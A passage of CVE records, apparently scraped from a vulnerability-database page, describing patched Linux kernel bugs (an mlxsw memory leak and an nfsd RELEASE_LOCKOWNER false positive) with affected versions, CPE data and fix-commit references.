          "url": "https://git.kernel.org/stable/c/292d2ac61fb0d9276a0f7b7ce4f50426f2a1c99f"
        },
        {
          "url": "https://git.kernel.org/stable/c/a02e1404e27855089d2b0a0acc4652c2ce65fe46"
        },
        {
          "url": "https://git.kernel.org/stable/c/975774ea7528b489930b76a77ffc4d5379b95ff2"
        },
        {
          "url": "https://git.kernel.org/stable/c/9f329d0d6c91142cf0ad08d23c72dd195db2633c"
        },
        {
          "url": "https://git.kernel.org/stable/c/e79ff8c68acb1eddf709d3ac84716868f2a91012"
        },
        {
          "url": "https://git.kernel.org/stable/c/9f3ccdc3f6ef10084ceb3a47df0961bec6196fd0"
        }
      ],
      "title": "Input: appletouch - initialize work before device registration",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2021-46932",
    "datePublished": "2024-02-27T09:44:00.108Z",
    "dateReserved": "2024-02-25T13:45:52.720Z",
    "dateUpdated": "2025-05-04T07:00:36.105Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35852 (GCVE-0-2024-35852)

Vulnerability from cvelistv5 – Published: 2024-05-17 14:47 – Updated: 2025-05-04 09:06

Title

mlxsw: spectrum_acl_tcam: Fix memory leak when canceling rehash work

Summary

In the Linux kernel, the following vulnerability has been resolved: mlxsw: spectrum_acl_tcam: Fix memory leak when canceling rehash work The rehash delayed work is rescheduled with a delay if the number of credits at end of the work is not negative as supposedly it means that the migration ended. Otherwise, it is rescheduled immediately. After "mlxsw: spectrum_acl_tcam: Fix possible use-after-free during rehash" the above is no longer accurate as a non-negative number of credits is no longer indicative of the migration being done. It can also happen if the work encountered an error in which case the migration will resume the next time the work is scheduled. The significance of the above is that it is possible for the work to be pending and associated with hints that were allocated when the migration started. This leads to the hints being leaked [1] when the work is canceled while pending as part of ACL region dismantle. Fix by freeing the hints if hints are associated with a work that was canceled while pending. Blame the original commit since the reliance on not having a pending work associated with hints is fragile. [1] unreferenced object 0xffff88810e7c3000 (size 256): comm "kworker/0:16", pid 176, jiffies 4295460353 hex dump (first 32 bytes): 00 30 95 11 81 88 ff ff 61 00 00 00 00 00 00 80 .0......a....... 00 00 61 00 40 00 00 00 00 00 00 00 04 00 00 00 ..a.@........... backtrace (crc 2544ddb9): [<00000000cf8cfab3>] kmalloc_trace+0x23f/0x2a0 [<000000004d9a1ad9>] objagg_hints_get+0x42/0x390 [<000000000b143cf3>] mlxsw_sp_acl_erp_rehash_hints_get+0xca/0x400 [<0000000059bdb60a>] mlxsw_sp_acl_tcam_vregion_rehash_work+0x868/0x1160 [<00000000e81fd734>] process_one_work+0x59c/0xf20 [<00000000ceee9e81>] worker_thread+0x799/0x12c0 [<00000000bda6fe39>] kthread+0x246/0x300 [<0000000070056d23>] ret_from_fork+0x34/0x70 [<00000000dea2b93e>] ret_from_fork_asm+0x1a/0x30

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/51cefc9da400b953f…
	https://git.kernel.org/stable/c/857ed800133ffcfce…
	https://git.kernel.org/stable/c/63d814d93c5cce4c1…
	https://git.kernel.org/stable/c/5bfe7bf9656ed2633…
	https://git.kernel.org/stable/c/de1aaefa75be9d0ec…
	https://git.kernel.org/stable/c/d72dd6fcd7886d052…
	https://git.kernel.org/stable/c/fb4e2b70a7194b209…

Impacted products

Vendor

Product

Version

Linux

Affected: c9c9af91f1d9a636aecc55302c792538e549a430 , < 51cefc9da400b953fee749c9e5d26cd4a2b5d758 (git)
Affected: c9c9af91f1d9a636aecc55302c792538e549a430 , < 857ed800133ffcfcee28582090b63b0cbb8ba59d (git)
Affected: c9c9af91f1d9a636aecc55302c792538e549a430 , < 63d814d93c5cce4c18284adc810028f28dca493f (git)
Affected: c9c9af91f1d9a636aecc55302c792538e549a430 , < 5bfe7bf9656ed2633718388f12b7c38b86414a04 (git)
Affected: c9c9af91f1d9a636aecc55302c792538e549a430 , < de1aaefa75be9d0ec19c9a3e0e2f9696de20c6ab (git)
Affected: c9c9af91f1d9a636aecc55302c792538e549a430 , < d72dd6fcd7886d0523afbab8b4a4b22d17addd7d (git)
Affected: c9c9af91f1d9a636aecc55302c792538e549a430 , < fb4e2b70a7194b209fc7320bbf33b375f7114bd5 (git)

Linux

Affected: 5.1
Unaffected: 0 , < 5.1 (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.158 , ≤ 5.15.* (semver)
Unaffected: 6.1.90 , ≤ 6.1.* (semver)
Unaffected: 6.6.30 , ≤ 6.6.* (semver)
Unaffected: 6.8.9 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35852",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-20T18:41:32.237249Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:34:10.715Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.279Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/51cefc9da400b953fee749c9e5d26cd4a2b5d758"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/857ed800133ffcfcee28582090b63b0cbb8ba59d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/63d814d93c5cce4c18284adc810028f28dca493f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5bfe7bf9656ed2633718388f12b7c38b86414a04"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/de1aaefa75be9d0ec19c9a3e0e2f9696de20c6ab"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d72dd6fcd7886d0523afbab8b4a4b22d17addd7d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fb4e2b70a7194b209fc7320bbf33b375f7114bd5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "51cefc9da400b953fee749c9e5d26cd4a2b5d758",
              "status": "affected",
              "version": "c9c9af91f1d9a636aecc55302c792538e549a430",
              "versionType": "git"
            },
            {
              "lessThan": "857ed800133ffcfcee28582090b63b0cbb8ba59d",
              "status": "affected",
              "version": "c9c9af91f1d9a636aecc55302c792538e549a430",
              "versionType": "git"
            },
            {
              "lessThan": "63d814d93c5cce4c18284adc810028f28dca493f",
              "status": "affected",
              "version": "c9c9af91f1d9a636aecc55302c792538e549a430",
              "versionType": "git"
            },
            {
              "lessThan": "5bfe7bf9656ed2633718388f12b7c38b86414a04",
              "status": "affected",
              "version": "c9c9af91f1d9a636aecc55302c792538e549a430",
              "versionType": "git"
            },
            {
              "lessThan": "de1aaefa75be9d0ec19c9a3e0e2f9696de20c6ab",
              "status": "affected",
              "version": "c9c9af91f1d9a636aecc55302c792538e549a430",
              "versionType": "git"
            },
            {
              "lessThan": "d72dd6fcd7886d0523afbab8b4a4b22d17addd7d",
              "status": "affected",
              "version": "c9c9af91f1d9a636aecc55302c792538e549a430",
              "versionType": "git"
            },
            {
              "lessThan": "fb4e2b70a7194b209fc7320bbf33b375f7114bd5",
              "status": "affected",
              "version": "c9c9af91f1d9a636aecc55302c792538e549a430",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.1"
            },
            {
              "lessThan": "5.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.158",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.90",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.30",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.158",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.90",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.30",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.9",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_acl_tcam: Fix memory leak when canceling rehash work\n\nThe rehash delayed work is rescheduled with a delay if the number of\ncredits at end of the work is not negative as supposedly it means that\nthe migration ended. Otherwise, it is rescheduled immediately.\n\nAfter \"mlxsw: spectrum_acl_tcam: Fix possible use-after-free during\nrehash\" the above is no longer accurate as a non-negative number of\ncredits is no longer indicative of the migration being done. It can also\nhappen if the work encountered an error in which case the migration will\nresume the next time the work is scheduled.\n\nThe significance of the above is that it is possible for the work to be\npending and associated with hints that were allocated when the migration\nstarted. This leads to the hints being leaked [1] when the work is\ncanceled while pending as part of ACL region dismantle.\n\nFix by freeing the hints if hints are associated with a work that was\ncanceled while pending.\n\nBlame the original commit since the reliance on not having a pending\nwork associated with hints is fragile.\n\n[1]\nunreferenced object 0xffff88810e7c3000 (size 256):\n  comm \"kworker/0:16\", pid 176, jiffies 4295460353\n  hex dump (first 32 bytes):\n    00 30 95 11 81 88 ff ff 61 00 00 00 00 00 00 80  .0......a.......\n    00 00 61 00 40 00 00 00 00 00 00 00 04 00 00 00  ..a.@...........\n  backtrace (crc 2544ddb9):\n    [\u003c00000000cf8cfab3\u003e] kmalloc_trace+0x23f/0x2a0\n    [\u003c000000004d9a1ad9\u003e] objagg_hints_get+0x42/0x390\n    [\u003c000000000b143cf3\u003e] mlxsw_sp_acl_erp_rehash_hints_get+0xca/0x400\n    [\u003c0000000059bdb60a\u003e] mlxsw_sp_acl_tcam_vregion_rehash_work+0x868/0x1160\n    [\u003c00000000e81fd734\u003e] process_one_work+0x59c/0xf20\n    [\u003c00000000ceee9e81\u003e] worker_thread+0x799/0x12c0\n    [\u003c00000000bda6fe39\u003e] kthread+0x246/0x300\n    [\u003c0000000070056d23\u003e] ret_from_fork+0x34/0x70\n    [\u003c00000000dea2b93e\u003e] ret_from_fork_asm+0x1a/0x30"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:06:51.339Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/51cefc9da400b953fee749c9e5d26cd4a2b5d758"
        },
        {
          "url": "https://git.kernel.org/stable/c/857ed800133ffcfcee28582090b63b0cbb8ba59d"
        },
        {
          "url": "https://git.kernel.org/stable/c/63d814d93c5cce4c18284adc810028f28dca493f"
        },
        {
          "url": "https://git.kernel.org/stable/c/5bfe7bf9656ed2633718388f12b7c38b86414a04"
        },
        {
          "url": "https://git.kernel.org/stable/c/de1aaefa75be9d0ec19c9a3e0e2f9696de20c6ab"
        },
        {
          "url": "https://git.kernel.org/stable/c/d72dd6fcd7886d0523afbab8b4a4b22d17addd7d"
        },
        {
          "url": "https://git.kernel.org/stable/c/fb4e2b70a7194b209fc7320bbf33b375f7114bd5"
        }
      ],
      "title": "mlxsw: spectrum_acl_tcam: Fix memory leak when canceling rehash work",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35852",
    "datePublished": "2024-05-17T14:47:29.441Z",
    "dateReserved": "2024-05-17T13:50:33.106Z",
    "dateUpdated": "2025-05-04T09:06:51.339Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26629 (GCVE-0-2024-26629)

Vulnerability from cvelistv5 – Published: 2024-03-13 14:01 – Updated: 2025-12-23 16:39

Title

nfsd: fix RELEASE_LOCKOWNER

Summary

In the Linux kernel, the following vulnerability has been resolved: nfsd: fix RELEASE_LOCKOWNER The test on so_count in nfsd4_release_lockowner() is nonsense and harmful. Revert to using check_for_locks(), changing that to not sleep. First: harmful. As is documented in the kdoc comment for nfsd4_release_lockowner(), the test on so_count can transiently return a false positive resulting in a return of NFS4ERR_LOCKS_HELD when in fact no locks are held. This is clearly a protocol violation and with the Linux NFS client it can cause incorrect behaviour. If RELEASE_LOCKOWNER is sent while some other thread is still processing a LOCK request which failed because, at the time that request was received, the given owner held a conflicting lock, then the nfsd thread processing that LOCK request can hold a reference (conflock) to the lock owner that causes nfsd4_release_lockowner() to return an incorrect error. The Linux NFS client ignores that NFS4ERR_LOCKS_HELD error because it never sends NFS4_RELEASE_LOCKOWNER without first releasing any locks, so it knows that the error is impossible. It assumes the lock owner was in fact released so it feels free to use the same lock owner identifier in some later locking request. When it does reuse a lock owner identifier for which a previous RELEASE failed, it will naturally use a lock_seqid of zero. However the server, which didn't release the lock owner, will expect a larger lock_seqid and so will respond with NFS4ERR_BAD_SEQID. So clearly it is harmful to allow a false positive, which testing so_count allows. The test is nonsense because ... well... it doesn't mean anything. so_count is the sum of three different counts. 1/ the set of states listed on so_stateids 2/ the set of active vfs locks owned by any of those states 3/ various transient counts such as for conflicting locks. When it is tested against '2' it is clear that one of these is the transient reference obtained by find_lockowner_str_locked(). It is not clear what the other one is expected to be. In practice, the count is often 2 because there is precisely one state on so_stateids. If there were more, this would fail. In my testing I see two circumstances when RELEASE_LOCKOWNER is called. In one case, CLOSE is called before RELEASE_LOCKOWNER. That results in all the lock states being removed, and so the lockowner being discarded (it is removed when there are no more references which usually happens when the lock state is discarded). When nfsd4_release_lockowner() finds that the lock owner doesn't exist, it returns success. The other case shows an so_count of '2' and precisely one state listed in so_stateid. It appears that the Linux client uses a separate lock owner for each file resulting in one lock state per lock owner, so this test on '2' is safe. For another client it might not be safe. So this patch changes check_for_locks() to use the (newish) find_any_file_locked() so that it doesn't take a reference on the nfs4_file and so never calls nfsd_file_put(), and so never sleeps. With this check is it safe to restore the use of check_for_locks() rather than testing so_count against the mysterious '2'.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/10d75984495f7fe62…
	https://git.kernel.org/stable/c/99fb654d01dc3f08b…
	https://git.kernel.org/stable/c/c6f8b3fcc62725e41…
	https://git.kernel.org/stable/c/e4cf8941664cae2f8…
	https://git.kernel.org/stable/c/b7d2eee1f53899b53…
	https://git.kernel.org/stable/c/8f5b860de87039b00…
	https://git.kernel.org/stable/c/edcf9725150e42bee…

Impacted products

Vendor

Product

Version

Linux

Affected: ef481b262bba4f454351eec43f024fec942c2d4c , < 10d75984495f7fe62152c3b0dbfa3f0a6b739c9b (git)
Affected: 3097f38e91266c7132c3fdb7e778fac858c00670 , < 99fb654d01dc3f08b5905c663ad6c89a9d83302f (git)
Affected: e2fc17fcc503cfca57b5d1dd3b646ca7eebead97 , < c6f8b3fcc62725e4129f2c0fd550d022d4a7685a (git)
Affected: ce3c4ad7f4ce5db7b4f08a1e237d8dd94b39180b , < e4cf8941664cae2f89f0189c29fe2ce8c6be0d03 (git)
Affected: ce3c4ad7f4ce5db7b4f08a1e237d8dd94b39180b , < b7d2eee1f53899b53f069bba3a59a419fc3d331b (git)
Affected: ce3c4ad7f4ce5db7b4f08a1e237d8dd94b39180b , < 8f5b860de87039b007e84a28a5eefc888154e098 (git)
Affected: ce3c4ad7f4ce5db7b4f08a1e237d8dd94b39180b , < edcf9725150e42beeca42d085149f4c88fa97afd (git)
Affected: fea1d0940301378206955264a01778700fc9c16f (git)
Affected: 2ec65dc6635d1976bd1dbf2640ff7f810b2f6dd1 (git)
Affected: a2235bc65ade40982c3d09025cdd34bc539d6a69 (git)
Affected: ba747abfca27e23c42ded3912c87b70d7e16b6ab (git)
Affected: e8020d96dd5b2dcc1f6a8ee4f87a53a373002cd5 (git)

Linux

Affected: 5.19
Unaffected: 0 , < 5.19 (semver)
Unaffected: 4.19.306 , ≤ 4.19.* (semver)
Unaffected: 5.10.220 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.79 , ≤ 6.1.* (semver)
Unaffected: 6.6.15 , ≤ 6.6.* (semver)
Unaffected: 6.7.3 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26629",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-21T16:10:40.555857Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-21T16:10:48.664Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:07:19.714Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/99fb654d01dc3f08b5905c663ad6c89a9d83302f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c6f8b3fcc62725e4129f2c0fd550d022d4a7685a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e4cf8941664cae2f89f0189c29fe2ce8c6be0d03"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b7d2eee1f53899b53f069bba3a59a419fc3d331b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8f5b860de87039b007e84a28a5eefc888154e098"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/edcf9725150e42beeca42d085149f4c88fa97afd"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/nfsd/nfs4state.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "10d75984495f7fe62152c3b0dbfa3f0a6b739c9b",
              "status": "affected",
              "version": "ef481b262bba4f454351eec43f024fec942c2d4c",
              "versionType": "git"
            },
            {
              "lessThan": "99fb654d01dc3f08b5905c663ad6c89a9d83302f",
              "status": "affected",
              "version": "3097f38e91266c7132c3fdb7e778fac858c00670",
              "versionType": "git"
            },
            {
              "lessThan": "c6f8b3fcc62725e4129f2c0fd550d022d4a7685a",
              "status": "affected",
              "version": "e2fc17fcc503cfca57b5d1dd3b646ca7eebead97",
              "versionType": "git"
            },
            {
              "lessThan": "e4cf8941664cae2f89f0189c29fe2ce8c6be0d03",
              "status": "affected",
              "version": "ce3c4ad7f4ce5db7b4f08a1e237d8dd94b39180b",
              "versionType": "git"
            },
            {
              "lessThan": "b7d2eee1f53899b53f069bba3a59a419fc3d331b",
              "status": "affected",
              "version": "ce3c4ad7f4ce5db7b4f08a1e237d8dd94b39180b",
              "versionType": "git"
            },
            {
              "lessThan": "8f5b860de87039b007e84a28a5eefc888154e098",
              "status": "affected",
              "version": "ce3c4ad7f4ce5db7b4f08a1e237d8dd94b39180b",
              "versionType": "git"
            },
            {
              "lessThan": "edcf9725150e42beeca42d085149f4c88fa97afd",
              "status": "affected",
              "version": "ce3c4ad7f4ce5db7b4f08a1e237d8dd94b39180b",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "fea1d0940301378206955264a01778700fc9c16f",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "2ec65dc6635d1976bd1dbf2640ff7f810b2f6dd1",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "a2235bc65ade40982c3d09025cdd34bc539d6a69",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "ba747abfca27e23c42ded3912c87b70d7e16b6ab",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "e8020d96dd5b2dcc1f6a8ee4f87a53a373002cd5",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/nfsd/nfs4state.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.19"
            },
            {
              "lessThan": "5.19",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.306",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.220",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.79",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.15",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.306",
                  "versionStartIncluding": "4.19.246",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.220",
                  "versionStartIncluding": "5.10.120",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "5.15.45",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.79",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.15",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.3",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "5.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.9.317",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.14.282",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.4.197",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.17.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.18.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfsd: fix RELEASE_LOCKOWNER\n\nThe test on so_count in nfsd4_release_lockowner() is nonsense and\nharmful.  Revert to using check_for_locks(), changing that to not sleep.\n\nFirst: harmful.\nAs is documented in the kdoc comment for nfsd4_release_lockowner(), the\ntest on so_count can transiently return a false positive resulting in a\nreturn of NFS4ERR_LOCKS_HELD when in fact no locks are held.  This is\nclearly a protocol violation and with the Linux NFS client it can cause\nincorrect behaviour.\n\nIf RELEASE_LOCKOWNER is sent while some other thread is still\nprocessing a LOCK request which failed because, at the time that request\nwas received, the given owner held a conflicting lock, then the nfsd\nthread processing that LOCK request can hold a reference (conflock) to\nthe lock owner that causes nfsd4_release_lockowner() to return an\nincorrect error.\n\nThe Linux NFS client ignores that NFS4ERR_LOCKS_HELD error because it\nnever sends NFS4_RELEASE_LOCKOWNER without first releasing any locks, so\nit knows that the error is impossible.  It assumes the lock owner was in\nfact released so it feels free to use the same lock owner identifier in\nsome later locking request.\n\nWhen it does reuse a lock owner identifier for which a previous RELEASE\nfailed, it will naturally use a lock_seqid of zero.  However the server,\nwhich didn\u0027t release the lock owner, will expect a larger lock_seqid and\nso will respond with NFS4ERR_BAD_SEQID.\n\nSo clearly it is harmful to allow a false positive, which testing\nso_count allows.\n\nThe test is nonsense because ... well... it doesn\u0027t mean anything.\n\nso_count is the sum of three different counts.\n1/ the set of states listed on so_stateids\n2/ the set of active vfs locks owned by any of those states\n3/ various transient counts such as for conflicting locks.\n\nWhen it is tested against \u00272\u0027 it is clear that one of these is the\ntransient reference obtained by find_lockowner_str_locked().  It is not\nclear what the other one is expected to be.\n\nIn practice, the count is often 2 because there is precisely one state\non so_stateids.  If there were more, this would fail.\n\nIn my testing I see two circumstances when RELEASE_LOCKOWNER is called.\nIn one case, CLOSE is called before RELEASE_LOCKOWNER.  That results in\nall the lock states being removed, and so the lockowner being discarded\n(it is removed when there are no more references which usually happens\nwhen the lock state is discarded).  When nfsd4_release_lockowner() finds\nthat the lock owner doesn\u0027t exist, it returns success.\n\nThe other case shows an so_count of \u00272\u0027 and precisely one state listed\nin so_stateid.  It appears that the Linux client uses a separate lock\nowner for each file resulting in one lock state per lock owner, so this\ntest on \u00272\u0027 is safe.  For another client it might not be safe.\n\nSo this patch changes check_for_locks() to use the (newish)\nfind_any_file_locked() so that it doesn\u0027t take a reference on the\nnfs4_file and so never calls nfsd_file_put(), and so never sleeps.  With\nthis check is it safe to restore the use of check_for_locks() rather\nthan testing so_count against the mysterious 